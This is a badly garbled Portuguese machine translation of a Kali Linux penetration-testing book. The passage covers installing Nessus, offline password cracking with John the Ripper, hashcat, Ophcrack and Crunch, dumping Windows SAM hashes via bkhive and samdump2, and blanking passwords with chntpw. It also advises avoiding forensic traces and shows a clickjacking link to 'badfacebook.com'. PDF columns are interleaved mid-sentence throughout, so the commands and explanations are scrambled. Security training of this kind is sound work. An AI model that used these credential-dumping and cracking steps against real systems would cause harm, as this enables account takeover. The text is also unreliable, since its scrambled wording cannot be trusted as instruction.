control.tar.gz o cdigo de ativao e baixar as Nessus HomeFeed est disponvel Haver agora uma etc diretrio e uma ltimas plugins. Captulo 4 apenas para uso pessoal e no optar diretrio. [146] Se o Digitalizao guia no estiver comercial. Se voc vai [145] disponvel, voc tambm pode usar o Nessus no seu local de Captulo 4 selecionar Modelos de Digitalizao trabalho, voc deve comprar Nessus Ataques do lado do cliente Voc tambm vai definir um nome de e Nova digitalizao para criar uma ProfessionalFeed. 3. Copie o nessus diretrio / Tmp / opt usurio e senha que ser usada para nova verificao. Para obter um cdigo de ativao para / ao / Opt diretrio, fazer o / gerenciar o Nessus Depois de selecionar Criar ir para o Nessus optar diretrio se ele no existir. Emita aplicao. As imagens abaixo Digitalizao, a digitalizao vai lanar http://www.tenable.com/products/ os seguintes comandos: mostram a criao de uma conta e no horrio agendado. O padro nessus / nessus-HomeFeed. mkdir / opt (Voc pode obter um erro fornecer a cronograma ser executado de O Nessus no vem pr-carregado com informando o diretrio / opt existe cdigo de ativao por e-mail por imediato, por isso, na maioria dos Kali e ter de ser instalado. Voc ir no entanto, passar para o prximo Tenable depois de registrar: casos, o exame vai comear a precisa baixar e instalar o Nessus. comando). [147] funcionar imediatamente. No h uma verso especfica para cp-rf / <installed folder> / opt / nessus / Aps a verificao for concluda, os Kali Linux, opt Ataques do lado do cliente resultados podem ser vistos clicando mas a verso Debian 6.0 funciona cp-rf / <installed folder> / etc / init.d / Download inicial dos plugins pode no Resultados guia. bem. nessus * / etc / init.d levar algum tempo, portanto seja Isto ir fornecer ao administrador um 1. Baixe Nessus para o Debian. Ir para 4. Voc pode excluir o contedo de paciente. relatrio do que o Nessus encontrado. o site http://www.tenable.com/ download do Nessus / Tmp diretrio. Uma vez que todas as atualizaes [149] products / nessus / select-seu-sistema 5. Para iniciar o Nessus, emita o foram baixadas e inicializado, voc operacional baixar Nessus seguinte comando: ser apresentado Ataques do lado do cliente para o Debian 64 bits. / Etc / init.d / start nessusd com tela de login. Use o nome de Podemos examinar os exames Note-se que quando voc baixar o 6. Log para a interface de usurio e senha que voc definiu concludos, bem como quaisquer Nessus, voc pode copi-lo para o / gerenciamento Nessus. Abra um durante a resultados obtidos at o momento, em Tmp navegador e navegue instalao inicial. qualquer diretrio. Se voc introduzir estes para https://127.0.0.1:8834. Para iniciar a digitalizao, clique no varreduras ativas, como mostra a comandos a partir de outro diretrio, Usando o Nessus Digitalizao guia na faixa de opes imagem a seguir: voc A primeira vez que voc entrar no superior e selecione New Scan. Voc Como um verificador da penetrao, ser necessrio ajustar os comandos. Nessus, voc ser saudado com ir voc quer prestar ateno a quaisquer Instalando o Nessus em Kali algumas mensagens de boas vindas, ento ser solicitado a digitar os vulnerabilidades. 2. V para o diretrio onde voc e um aviso SSL ir aparecer detalhes do alvo. Voc tambm ser Vulnerabilidades identificadas pelo baixou o Nessus e emitir o permitindo que voc saiba que voc solicitado a selecionar o que seu patch ou vulnerabilidade os seguintes comandos: est se conectando a uma auto- modelo que voc gostaria de usar. referncia Microsoft ar vx Nessus-5.2.1-debian6 * assinado Nessus tem alguns modelos tar-xzvf data.tar.gz integrados. Neste exemplo, nmero pode ser pesquisada no Quebra de senha por definio, a um nmero reduz drasticamente o Hbrido: Combinando dicionrio com mbito Metasploit usar um exploit em recuperao de senhas a partir de nmero de resultados possveis de um fora bruta um dados que tem sido hacker As senhas devem ser armazenados alvo host. Consulte Captulo 3, os armazenados ou transmitidos por um precisa para tentar quebrar uma de modo que os sistemas possam ataques do lado do servidor, sobre sistema de computador. As senhas senha. (Kali oferece uma ferramenta verificar a identidade de um usurio e como utilizar o Metasploit para so usadas para proteger vrios chamada Crunch que faz acesso mais informaes. tipos de sistema, o que temos gerando uma lista de senhas para direitos. Sistemas no armazenar O exemplo anterior mostra algumas abordadas no Captulo 3, os ataques este tipo de ataque extremamente senhas em arquivos de texto simples, vulnerabilidades extremamente do lado do servidor, enquanto fcil). por razes bvias de segurana. perigosas (no atacar servidores web. [151] A maioria dos sistemas no usam se preocupe, ns voltamos e corrigido Os sistemas host so geralmente criptografia como o nico meio para dos sistemas). Todas estas baseados em Linux e Windows ou ter Ataques do lado do cliente proteger senhas, porque um vulnerabilidades pode ser caractersticas especficas Um verificador da penetrao chave necessria para desencriptar, usada para explorar um sistema a respeito de como eles armazenar e experiente deve usar tcnicas de o que representa uma fraqueza de usando Metasploit ou outras proteger senhas de usurios. Esta reconhecimento apresentados em proteger os arquivos criptografados. ferramentas de ataque. Para mais seo se concentrar Captulo Hashing Foi inventado como um meio informaes sobre a explorao em rachar arquivos de senha do 2, reconhecimento, para identificar os para transformar uma chave ou senha, vulnerabilidades encontradas pelo sistema host. Ns inclumos isso no tipos de sistema, possveis polticas geralmente aritmtica, Nessus, consulte Metasploit em Aplicao Web de senha, as pessoas envolvidas para um valor completamente Captulo 3, os ataques do lado do Teste de Invaso livro, porque os com os sistemas de administrao e diferente. Hash irreversvel e produz servidor. sistemas de acolhimento um cliente outras informaes que ajudam a o mesmo [150] autorizado comum diminuir a valor para uma chave inserida, o que aplicaes web. Comprometer um possibilidades necessrias para significa um hash podem ser Captulo 4 cliente significa abrir uma porta de quebrar uma senha. armazenados e verificados contra um Nessus oferece opes para exportar acesso a um alvo Existem algumas formas hackers introduzido uma senha para verificar a detalhes sobre as vulnerabilidades aplicao web. quebrar senhas. Estes so listados autenticidade. Mudando um fator, identificadas. Voc pode O mtodo mais fcil de obter senhas como se segue: como fazer uma carta resultados de exportao como HTML, de usurios por meio de engenharia de capital ou adicionar um espao, CSV, PDF, e muitos outros tipos de social. Como gera uma sada de hash arquivos comuns. Para exportar descrito anteriormente, um hacker completamente diferente. resultados, v para o Resultados poderia obter senhas ou pistas de Os hashes podem ser brute-forados seo e selecionar uma varredura como senhas Adivinha: Acho manualmente usando como uma senha se voc sabe a completa. A terceira aba na so criados, colocando como um informaes obtidas sobre um alvo frmula para a gerao de esquerda oferece opes para sujeito autorizado. Por exemplo, a Ataque de dicionrio: Use um ataque um Hash. Muitas ferramentas de exportar scans, como mostrado nas identificao de que todos automatizado que tenta todos os quebra de senhas, como John the duas imagens seguintes: senhas devem ter entre 6-10 possveis Ripper capaz de Nessus Exportao de digitalizao caracteres, comear com uma letra palavras do dicionrio detectar um hash e de fora bruta Obteno e rachaduras senhas de maiscula e termina com Brute-force: Tente todas as ataca todas as combinaes de sada usurios combinaes possveis de caracteres de hash com sadas de hash gerado Microsoft tem tido uma estrada Um lugar comum para encontrar uma 2. Roubando a SAM e SISTEMA automaticamente. Uma vez que uma rochosa sobre senhas que protegem. SAM arquivo est no C: \ urticria (C: \ <systemroot> \ sys32 \ correspondncia for encontrada, John O actual <systemroot> \ repair pasta. config). the Ripper ir imprimir Os produtos da Microsoft so muito A cpia de segurana SAM arquivo 3. Recuperando-se a chave de a senha de texto simples usado para mais seguras do que as verses mais criado por padro e, normalmente, inicializao do SISTEMA colmeia gerar o hash correspondente. antigas, no entanto, eles so no excludos pelo sistema usando bkreg ou bkhive. Tabelas do arco-ris o pior ainda vulnervel a ataques de muitas administradores. O arquivo de backup 4. Despejar os hashes de senha. adversrio para algoritmos de hash ferramentas oferecidas em Kali. est desprotegido, mas comprimido, o 5. Quebr-las off-line com uma comuns. Arco-ris Windows armazena senhas na SAM que significa que voc ferramenta como o John the Ripper. tabelas so uma base de dados pr- (Sistema Gesto de Contas) registro deve descompactar o arquivo para [153] calculado de todas as sadas de hash arquivo. A exceo a isso quando obter os arquivos de hash. Voc pode que podem ser pesquisados Active Directory usado. Um Active usar o utilitrio de expandir-se para Ataques do lado do cliente para identificar uma sada de hash. Directory fazer isso. O comando Expandir Note que se voc acessar um arquivo Sites como um sistema de autenticao separado [FILE] [DESTINO]. Aqui est um no Windows, voc modificar o MAC www.freerainbowtables.com oferta que armazena senhas em um banco exemplo de (modificar, verses para os algoritmos de hash de dados LDAP. O SAM expanso do SAM arquivo para o acesso e mudana), que a forma populares, tais como MD5 arquivo est localizado em C: \ descomprimida SAM arquivo. como o Windows registra sua encontrados na maioria dos sistemas <systemroot> \ sys32 \ config. C: \> expandir SAM presena. Para evitar Windows. O SAM arquivo armazena as senhas uncompressedSAM deixando evidncias forenses, Kali tambm oferece aplicaes como em um formato de hash usando o LM Para aumentar a segurana de recomenda-se a copiar o host de RainbowCrack usado para gerar as e NTLM de hash hackers desligada, Microsoft Windows destino tabelas do arco-ris. para aumentar a segurana para o 2000 e sistema antes de lanar ataques. Salga um hash foi criado como uma arquivo protegido. O SAM arquivo no verses mais recentes incluem um Montagem do Windows forma de combater as tabelas do arco- pode ser movido ou copiado enquanto SYSKEY utilidade. O SYSKEY Existem ferramentas disponveis para ris, adicionando Windows est em execuo. O SAM utilitrio criptografa o hash a captura do Windows SAM e pedaos personalizados adicionais arquivo pode ser despejado, exibindo senhas no SAM arquivo usando a SYSKEY arquivos. Um para mudar a sada de um hash para os hashes de senha chave de criptografia de 128 bits, que mtodo para capturar esses arquivos algo no encontrado que pode ser movido fora do ar por um diferente a montagem do sistema de destino em tabelas comuns do arco-ris. uma ferramenta de fora bruta de chave para cada instalao. do Windows para que o Infelizmente, muitos sistemas, como o crack. Um hacker tambm pode obter Um invasor com acesso fsico a um outras ferramentas podem acessar Windows fazer o sistema Windows podem obter o esses arquivos, enquanto a Microsoft no usar hash salgado. SAM arquivo inicializando um sistema SYSKEY Windows no est em execuo. [152] operacional diferente, montagem C: \, (Tambm chamada a tecla de O primeiro passo consiste em usar o Iniciar uma distribuio Linux em arranque), usando os passos fdisk-l comando para identificar suas Captulo 4 um disco (como Kali), ou arrancar a seguintes: parties. Voc deve As senhas do Windows partir de uma unidade de CD / 1. Iniciando um outro sistema identificar o Windows e tipos de Windows o sistema operacional disquete. operacional (como Kali). partio. O fdisk resultado mostra uma mais utilizado por empresas no mundo partio NTFS, todo. como se segue: Blocos Dispositivo Boot Incio Fim Captulo 4 Kali oferece diversos utilitrios para hashes e senhas criptografadas, Sistema Id bkreg e bkhive so ferramentas burlar a segurana da senha. tornando / Dev/hdb1 * 1 2432 19535008 + 86 populares que podem obter a Bootkey Ferramentas de quebra de senha o processo mais fcil para os NTFS apresentar, como mostrado na pode testadores de penetrao. Atacantes / Dev/hdb2 2433 2554 979965 82 tela a seguir: ser encontrado em Ataques senha e como a ferramenta, pois muito Linux swap / Solaris Sistemas host Linux no so to divide-se em ferramentas utilizadas customizvel e pode ser configurado / Dev/hdb3 2555 6202 29302560 83 comuns como o Windows e para off-line e on-line em uma variedade de maneiras Linux representam um desafio diferente ataques. Esta seo ir focar em diferentes de acelerao Crie um ponto de montagem utilizando para a obteno de acesso root. ferramentas utilizadas para sistemas quebra de senha. o comando mkdir / mnt / windows. Muitos sistemas podem ter as senhas host de compromisso durante uma Algumas personalizaes podem no Monte o sistema do Windows usando armazenadas em claro aplicao Web Penetration Test. H estar disponveis em Johnny. o comando como mostrado no quando auto-login est habilitado, outras ferramentas disponveis no Recomenda-se o exemplo a seguir: como o . Netrc arquivos usados para Kali, como ferramentas verso de linha de comando, John the mount-t <WindowsType> <Windows Telnet e FTP. Para projetado para quebrar senhas de Ripper, para a maioria dos ataques. partition> / mnt / windows a maioria dos ataques, voc vai querer protocolos sem fio, no entanto, que John the Ripper funciona da seguinte Agora que o seu alvo do sistema capturar o passwd e sombra arquivos est fora do escopo maneira: Windows montado, voc pode copiar armazenados comumente neste texto. o SAM e em / Etc / passwd e / Etc / shadow. [155] SISTEMA arquivos em seu diretrio O sombra arquivo pode ser lido ataque usando o seguinte comando: apenas pelo root e, normalmente um Ataques do lado do cliente cp SAM SYSTEM / pentest / hash MD5. O sombra Note-se que John a linha de comando passwords / AttackDirectory arquivo mais difcil de entender do Ripper e Hydra estavam cobertos de Existem ferramentas disponveis para que uma janela de SAM arquivo. Captulo 3, os ataques do lado do As tentativas de cracking de senhas despejar o SAM arquivo. PwDump e Existem mtodos de captura servidor. com palavras de dicionrio Caim e Abel o sombra arquivo usando Johnny Usa dicionrio palavras com so apenas alguns exemplos. Kali carregadores de inicializao como Johnny uma interface grfica para o caracteres alfanumricos e anexado ofertas samdump mostrado, na seo larva. John muito popular a ferramenta preconfinado de ferramentas de senha Quebrando uma senha Linux similar quebra de senha Ripper. Ns Coloca dicionrio palavras juntas deste captulo. a outros sistemas, como o Windows. A cobriu a verso de linha de comando Adiciona caracteres alfanumricos Note que voc vai precisar para maioria tradicional de John the Ripper para combinar palavras recuperar tanto o Bootkey e SAM hbridas automatizado programas de Captulo 3, Servidor- Executa palavras de dicionrio com arquivos. cracking, como John the Ripper pode Ataques laterais. Tal como a verso caracteres especiais misturados O Bootkey arquivo usado para identificar o tipo de linha de comando, Johnny tem Quando tudo mais falhar, as tentativas acessar o SAM arquivo. Ferramentas de haxixe e ataque de fora bruta a vrios mecanismos que permitem de fora bruta. utilizadas para acessar o sombra senhas com o dicionrio ele para quebrar diferentes tipos de Para usar Johnny, v para Ataques SAM arquivo exigir a Bootkey direita. senhas, incluindo senhas senha |Ataques offline e selecione arquivo. Senhas Linux criptografadas e hash. Johnny. [154] Kali quebra de senha ferramentas Johnny tem a capacidade de detectar automaticamente a maioria dos Clique em Abrir Arquivo de senhas e manualmente / Pentest / passwords / mltiplas hashes e listas de senhas isso, porque simples de usar e inclui selecione o arquivo de senha que john / john. Kali 1.0 padro / durante uma sesso de ataque nico. a exibio o cdigo de linha de deseja crack. user / sbin / john. O hashcat / comando no A figura a seguir mostra um sombra O Sada guia mostra o que Johnny utilitrios oclHashcat oferecem muitas janela inferior. arquivo com os usurios BOB, mary, e est atacando. Voc tambm vai opes de ataque, como a fora bruta, [160] joey encontrar erro combinador, como os alvos. mensagens e atualizaes sobre o dicionrio, hbrido, mscara, e os Captulo 4 [156] status de uma sesso de ataque. O ataques baseados em regras. samdump2 um utilitrio que despeja exemplo a seguir [159] os hashes de senha do Microsoft Captulo 4 mostra uma mensagem que apresenta Windows a partir de O Senha guia ser preenchida como Johnny identificar o tipo de hash: Ataques do lado do cliente umaSAM ficheiro de modo a que eles Johnny rachaduras as senhas. John the Ripper e listas de palavras- BackTrack oferece muitas verses de possam ser quebrada por uma Johnny tem guias de configurao no padro da sua interface grfica hashcat encontrado em Privilege ferramenta desligada. Para as verses lado esquerdo. O Opes guia onde muito limitada. Ns Escalation mais recentes do voc seleciona recomendamos o uso de uma lista |Ataques senha |Ataques offline. O cl Windows, voc vai precisar de uma o tipo de ataque. A figura a seguir maior, que pode ser encontrada "ocl", ou aberto, aberto ferramenta para capturar o SYSKEY mostra uma definio do padro atravs de pesquisa on-line. Para usar implementao de unificar os drivers Arquivo (chave de inicializao) para comportamento e as opes para um da Nvidia e ATI GPU. Algumas acessar os hashes armazenados no selecionar o tipo de hash. Deteco wordlist costume, v para o Opes verses podem SAM base de dados. automtica de Johnny guia e selecione Modo Wordlist. no funcionar mesmo depois de samdump2 pode ser encontrado em normalmente 90 por cento correto. Navegue at o seu atualizar BackTrack. Pode ser Ataques senha |Ataques offline [157] lista de palavras personalizada e necessrio fazer o download da |samdump2. clique em Aplicar. atualiza Quando voc abre samdump, Um Ataques do lado do cliente [158] verses de www.hashcat.net. Terminal janela pop-up. O Estatstica guia exibe quanto tempo Para usar hashcat, abra o aplicativo samdump2 Johnny tem funcionado uma sesso Captulo 4 hashcat ou navegue at Ataques Voc deve montar o seu alvo de ativa. Johnny vai preencher as clulas de senha sistema do Windows, de modo que O Configuraes guia especifica como senha ao lado de nomes como senhas |Ataques offline |hashcat. samdump pode acessar o SAM Johnny ser executado, como esto rachados. O Para usar hashcat em um documento, arquivo. mostrado no exemplo a seguir: imagem seguinte mostra dois dos trs tipo hashcat [opes] hashfile Em seguida, copie o SAM e SISTEMA Note-se que as configuraes padro senhas rachado: [WORDFiles | diretrios. O exemplo a arquivos em seu diretrio ataque. para o caminho para John the Ripper hashcat e oclHashcat seguir mostra hashcat a execuo de cp do sistema SAM / root / pode no ser hashcat e oclHashcat so utilitrios um AttackDirectory correta. Certifique-se de verificar o cracker de senha. oclHashcat um lista de palavras contra um sombra Navegue at o diretrio ataque e caminho para John the Ripper sob GPGPU- arquivo: emisso bkhive bootkey SISTEMA Configuraes. verso baseada. Os utilitrios hashcat hashcat oferece uma interface grfica, para se obter o Em verses mais antigas do / oclHashcat so ferramentas que bem como, que funciona como um bootkey. Copie o bootkey em um BackTrack, descobrimos que voc tem podem lidar com multithread frontend para o CLI. Algumas pessoas arquivo de texto para que samdump que atualizar o caminho gostam tem o SAM arquivo com bootkey. O SAM arquivo geralmente est Neste exemplo, temos digitado Captulo 4 cd / root / AttackDirectory> localizado sob / chntpw-u "Administrador" SAM, e Ophcrack windowshashfiles.txt Windows/System32/config. Voc vai temos a Ophcrack um cracker de senha do Executar samdump usando o precisar de seguinte menu: Windows com base em tabelas do samdump SAM bootkey comando. para navegar no Terminal tela para Agora temos a opo de limpar a arco-ris. Kali oferece uma CLI Copie a sada este diretrio. Em seu sistema, pode senha, alterar a senha, ou e verso GUI. Ophcrack pode importar em um segundo arquivo de texto. parecer promovendo o usurio administrador. hashes de uma variedade de Samdump2 SAM bootkey> algo como isto: Alterando a senha nem sempre formatos, incluindo windowshashfiles2.txt / funciona despejo diretamente do SAM arquivos Agora, use uma ferramenta de quebra Media/hda1/Windows/System32/config em sistemas Windows 7, por isso do Windows. O seguinte mostra de senha, como John the Ripper para Cada sistema pode ser ligeiramente recomendamos limpar a senha. Ao imagem de tela quebrar os hashes! diferente. Neste exemplo, Kali parece fazer isso, voc alguns dos formatos disponveis para chntpw estar a usar o ser capaz de entrar no sistema alvo carregar em Ophcrack: chntpw uma ferramenta on Kali nmero de srie do meu disco rgido com uma senha em branco. Ophcrack vem com built-in tabelas do Linux, Backtrack, e outras como a localizao do dispositivo. Isso [163] arco-ris, como mostrado no exemplo distribuies Linux que redefine porque eu tenha inicializado a seguir. Ns senhas locais no Windows 8 e verses de uma mquina virtual Windows 7 Ataques do lado do cliente recomendvel carregar as tabelas anteriores do Windows. Ele modifica o com o Live CD do Kali. O SAM base Para acessar chntpw, V para o mais recentes do arco-ris ao invs de Banco de dados de senha do de dados geralmente Ataques senha |Ataques offline usar as tabelas padro. Windows. Esta ferramenta utilizada no / Media / name_of_hard_drive / |chntpw. ATerminal [165] principalmente para a obteno no Windows/System32/config. janela se abrir, mostrando a tela de Windows [162] boas-vindas para chntpw. Existem Ataques do lado do cliente caixas quando voc no sabe a alguns Tabelas do arco-ris esto disponveis senha. Captulo 4 maneiras de usar chntpw, como a partir de fontes online, como o site [161] A captura de tela a seguir lista o SAM descrito na pgina de destino principal do desenvolvedor arquivo de banco de dados no meu da seguinte forma: http://ophcrack.sourceforge.net/tables. Ataques do lado do cliente disco rgido: Para usar o modo interativo, tipo php. Para usar chntpw, Arrancar a mquina O comando chntpw-l SAM ir listar chntpw-i eo caminho para o SAM Para acessar ophcrack, ir a Ataques Windows com o Live CD do Kali. Para todos os nomes de usurios que esto arquivo. Se o destino senha |Ataques offline e selecione o baixar contidos em um sistema montado, voc ter de CLI ou verso GUI. Clique em Carga, Kali Linux, v para o o sistema Windows. A figura a seguir especificar a localizao da SAM e selecione o caminho para o arquivo http://www.kali.org/downloads/ e mostra o resultado da execuo do arquivo dentro do que voc deseja quebrar baixar a imagem ISO. comando chntpw-l SAM: diretrio montado. (Por exemplo, um Windows SAM Queime o ISO em um CD e iniciar a O comando d-nos uma lista de Um menu ir aparecer oferecendo arquivo). mquina Windows com o CD ao vivo. nomes de usurios no sistema. opes para alterar o SAM arquivo. [166] Na inicializao Quando temos a Voc pode selecionar menu para Kali, selecione Forensics username queremos modificar, opo 1em branco a palavra-passe. Captulo 4 opo. corremos o comando chntpw-u [164] "username" SAM. Para este exemplo, foi utilizado o Kali Crunch tem caracteres especiais que Agora o arquivo de texto tem todas as dictstat um utilitrio de script Python ISO em uma mquina Windows e se traduzem para o seguinte: letras minsculas e nmeros, como utilizado para anlise dos resultados inicializado em Kali mostrado na de cracking de senha ou para Forensics modo. Ns ler a / seguinte exemplo: uma anlise wordlist regular. dictstat Windows/system32/config diretrio Outras ferramentas disponveis no Kali ir analisar os resultados e fornecer para chegar ao Existem outras ferramentas teis mscaras para o SAM base de dados. Voc pode @: Insere caracteres minsculos encontrados em Kali. Ns limitamos a -bruta forando combinaes de aprender mais sobre como usar Kali %: Os nmeros de inseres lista de utilitrios que senha que j foram quebrados. Esta Linux no Forensics modo ,: Caracteres maisculos Inseres auxiliar comprometer sistemas host vontade em Captulo 7, contramedidas ^: Smbolos Inseres que acessam servidores de aplicativos provvel fornecer pistas para rachar defensivas, deste livro. Voc tambm Para este exemplo, vamos supor que web. Tem mais hashes em grupo. Isto pode ser pode usar uma cpia offline conhecemos nossos usos alvo passar outras ferramentas de quebra de til do SAM banco de dados diretamente seguido por dois senhas disponveis em Kali no quando o direcionamento de uma com Kali. caracteres desconhecidos em sua mostradas nesta lista, no entanto, o empresa com uma poltica de senha. [167] senha. Para executar Crunch para foco dessas ferramentas est fora do A figura a seguir uma senha de seis caracteres escopo deste texto. mostra o dictstat tela inicial: Ataques do lado do cliente tendo passagem seguido de dois Hash-identificador um utilitrio [171] Voc dever ver o hash com o nome nmeros desconhecidos, uso %% Python usado para identificar os tipos de usurio e ID de usurio. Clique no para representar qualquer nmero. de hash. Mais password Ataques do lado do cliente Fenda boto Para executar este e colocar a sada ferramentas de cracking, como John Para executar dictstat, Tipo dictstat e esperar para a senha. em um arquivo de texto chamado the Ripper incluir uma funo de [opes] passwords.txt. A sequncia Crunch newpasswordlist.txt, Utilizar o deteco automtica para hashes imagem mostra um exemplo do uso Crunch uma ferramenta usada para exemplo de entrada: que so muito bons e provavelmente dictstat: gerar listas de senhas. Isto pode ser O arquivo de texto de sada conter 90 por cento preciso. Esta utilidade RainbowCrack o programa de extremamente til se voc todas as possveis combinaes de pode ser utilizado para quebra de hash que gera tabelas do so capazes de reunir informaes nmeros. A sequncia verificar um tipo de hash arco-ris para ser sobre a forma como o seu alvo cria imagem mostra a parte superior do manualmente. Para usar Hash- usado em quebra de senha. senhas. Por exemplo, se arquivo de sada: identificador, execute o utilitrio e RainbowCrack diferente do que a voc capturar duas senhas e observe [169] col-lo em fora bruta padro o alvo usa uma fase seguido por uma cpia do hash. abordagem usando grandes tabelas acaso Ataques do lado do cliente [170] pr-computadas para reduzir o dgitos, triturao pode ser utilizada Para adicionar todas as letras Hash-identificador perodo de tempo necessrio para para gerar rapidamente uma lista de minsculas, use triturar 6 6-t quebrar uma senha. RainbowCrack que frase seguido por todo o passagem seguido pela @ @ Captulo 4 uma aplicao decente, no entanto, h possveis dgitos aleatrios. representando A figura a seguir mostra uma sada de muitos [168] todas as letras minsculas, como um hash: Rainbow Tables gratuitos disponveis mostrado no exemplo a seguir: dictstat para download, como Captulo 4 www.freerainbowtables.com. A figura a seguir mostra a Resumo Muniz um funcionrio do governo, comum que a autenticao do RainbowCrack tela inicial: Os sistemas host so uma fonte bem como o seu laptop emitido pelo usurio envolve o uso de um nome de RainbowCrack (rcracki_mt) autorizada que acessar aplicaes governo usurio e senha [172] web. Comprometedor agncia. Como um verificador da combinao. Torna-se complicado um recurso autorizado poderia dar um penetrao, valioso para ser capaz para um usurio para inserir essas Captulo 4 verificador da penetrao aprovado de ganhar a confiana de um sistema informaes a cada findmyhash acesso a um alvo de tempo de autenticao necessria. findmyhash um script Python, que aplicao web. Este conceito muitas e segurana de bypass como uma Para superar isso, single sign-on foi usa um servio online gratuito para vezes esquecido quando Teste de entidade autorizada. criado como um quebrar hashes. Invaso O Certified Information Systems significa para autenticar uma a uma Voc deve ter acesso Internet antes aplicaes web. Security Professional Currculo autoridade central que tem a de usar esta ferramenta. A figura a Neste captulo, abordamos vrios (CISSP) confiana de outros sites. seguir mtodos para obter acesso no classifica a autenticao baseada em A autoridade central ir verificar a espetculos findmyhash a execuo autorizado ao anfitrio trs tipos de fator, como segue: confiana em nome do usurio ou de um hash MD5 contra vrios sites: sistemas. O foco est usando dispositivo, de modo que o usurio phrasendrescher um passe frase engenharia social, identificando os pode processamento multi-modular e hosts vulnerveis e acesso mltiplo sistemas protegidos, rachaduras ferramenta. rachaduras senhas. H muitos livros Algo que voc sabe, como um PIN ou sem ter que ser solicitado em cada phrasendrescher vem com uma srie disponveis que incidem sobre hacking palavra-passe segurana de plugins, bem como API que permite anfitrio Algo que voc tem, como um carto gateway. A autoridade comum de desenvolvimento de novos plugins. sistemas, que poderiam ser teis inteligente confiana um controlador de phrasendrescher quando alavancado com os temas Algo que voc , como uma domnio do Windows, fornecendo CmosPwd abordados neste livro. impresso digital autenticao para usurios internos CmosPwd usado para quebrar a Ns limitado o escopo deste captulo O mtodo mais comum pelo qual as para recursos da intranet. Em tais BIOS (Bsico Input Output System) para a segmentao de hosts, pessoas confirmar a sua identidade casos, comprometendo senha. especificamente, que o acesso web est usando algo uma autoridade confivel ou uma CmosPwd permite apagar / kill, aplicaes. eles sabem, como uma senha. Ns conta com privilgios elevados pode backup e restaurar o CMOS. O prximo captulo ir cobrir atacando cobrimos vrias maneiras para significar o acesso a muitos outros [173] como anfitries autenticar para quebrar senhas em recursos internos deste tipo de aplicaes web. Captulo 4, Ataques lado do cliente, ao sistema. Ataques do lado do cliente [174] atacar sistemas host. Rachando uma creddump senha Atacando Autenticao creddump uma ferramenta de Atacando Autenticao vai te dar acesso a alguns sistemas no Muitos rgos do governo alavancar python para extrair vrias credenciais Autenticao o ato de confirmao entanto, muitos alvos ir alavancar um Verificao de Identidade Pessoal e segredos do Windows da confiana da prpria identidade. multifatorial (PIV) ou ramos de registo. creddump pode Isso pode envolver autenticao, ou seja, uma Carto de Acesso Comum (CAC), extrair LM e NT hashes (SYSKEY confirmar a identidade de uma combinao de passos de juntamente com uma senha, para protegida), armazenada em cache pessoa, programa ou hardware, tais autenticao para provar sua atender os usurios tm algo senhas de domnio e segredos LSA. como a verificao Joseph identidade. e saber. comum que os em sistemas host atravs de uma sesses com privilgios de alto nvel, Clickjacking trabalhadores remotos para usar um gesto cookie. A partir da, vamos e tempo ilimitado para acessar o Clickjacking uma tcnica onde um token digital que produz olhar para esconder em aplicativo web. atacante engana um usurio a clicar um nmero fresco a cada poucos entre o cliente eo servidor utilizando por isso que os recursos de em algo segundos, juntamente com um PIN tcnicas de ataque man-in-the-middle. segurana de gerenciamento de alm do que eles acreditam que esto para representar algo que A ltima sesso, como intervalos de tempo clicando. Clickjacking pode ser usado ter e saber. Locais fsicos de alta tpicos sero identificar e explorar a limite da sesso para revelar segurana pode exigir a digitalizao fraqueza na forma como aplicaes e certificados SSL, foram criados. De informaes confidenciais, como as de impresses digitais web aceitar qualquer forma, as ferramentas credenciais de login, bem como junto com PIN para acesso. dados de autenticao atravs de disponveis em Kali pode identificar permitir uma Tecnologia de controle de acesso de SQL e cross-site scripting (XSS). falhas na forma como as sesses so invasor assuma o controle do rede pode verificar como a [176] gerenciados, como a captura de uma computador da vtima. Clickjacking usurio autenticado em um sesso ativa em uma web geralmente expe um computador porttil, bem como Captulo 5 Sair ps aplicao de usurio e usar a problema de segurana navegador ou procurar um certificado escondido Atacar o gerenciamento de sesses sesso para outra pessoa (tambm vulnerabilidade usando o cdigo para verificar Autenticao e gerenciamento de conhecido incorporado ou script que a identidade do sistema e do usurio sesso compem todos os aspectos como um ataque de fixao de executado sem o conhecimento da antes de fornecer recursos de rede. da manipulao de usurio sesso). vtima. Um exemplo de realizao crtico autenticao e gerenciamento de Ataques de gerenciamento de sesso de clickjacking identificar o mtodo de autenticao sesses ativas. Com relao s pode ocorrer usando vulnerabilidades tendo o texto do hiperlink para um site usado pelo seu alvo durante o aplicaes web, em aplicaes ou como confivel diferente do que o prprio reconhecimento uma sesso o perodo de tempo que usurios acessar e autenticar para site. A mdia fase de um teste de penetrao, assim os usurios gastam em um site. A essas aplicaes. Formas comuns usurio no verificar antes de clicar voc pode planejar uma estratgia melhor prtica a gesto atacantes fazer isso em hiperlinks, ou avisos mudanas para contornar essa confiana. sesses autorizadas (isto , o que atravs de cross-site scripting ou associadas com O foco deste captulo em torno de voc tem permisso para acessar), ataques de injeo de SQL para um tentativas clickjacking comuns, como os usurios e dispositivos de com base em como as pessoas servidor web, o que ser tornando esta uma forma muito eficaz autenticao para web e dispositivos de autenticao, bem coberto mais tarde neste captulo. Os de ataque. aplicaes com o objetivo de como, controlar o que e quanto tempo invasores tambm podem tirar No exemplo a seguir, o usurio ver comprometer essa confiana. Vamos os recursos proveito de cookies de sesso em Visite-nos no Facebook.com No comear atacando o esto disponveis durante a sesso navegadores da web ou vulne- entanto, quando processo de gerenciamento de ativa. Isso faz com que a autenticao rabilidades em pginas web para clicar no texto, eles vo realmente ser sesses de autenticao, que como um aspecto fundamental da alcanar resultados semelhantes. redirecionado para a confiana estabelecida entre gerenciamento de sesses Vamos comear www.badfacebook.com. o cliente e o servidor. Em seguida, autorizadas. olhando para uma tcnica usada para <a vamos nos concentrar nos clientes, O objetivo de um verificador da enganar os usurios para que href="http://www.badfacebook.com"> atacando como os dados so penetrao identificar contas que divulguem informaes sensveis, ou Visite-nos em Facebook.com </ a> armazenados so permitidos o acesso a expondo-se a ataques atravs de [177] hiperlinks e iFrames modificadas. Atacando Autenticao Cookies so um pequeno pedao de autentica. O sinal de sesso usada o atacante fora da sesso. Este um Clickjacking pode ser mais malicioso e dados enviados de um site e como uma forma de reconhecer entre problema para alguns aplicativos complicado do que mudar hiperlinks. armazenado em uma teia de usurio diferentes mveis que Os atacantes que usam clickjacking navegador enquanto o usurio est ligaes. Seqestro de sesso ocorre biscoitos de alavancagem que no iFrames normalmente incorporar em acessando o site. O site pode usar um quando um atacante captura um token expiram, ou seja, um atacante pode uma pgina web. O contedo cookie para de sesso e obter acesso dos iFrames contm dados do site de verificar o retorno do usurio para o 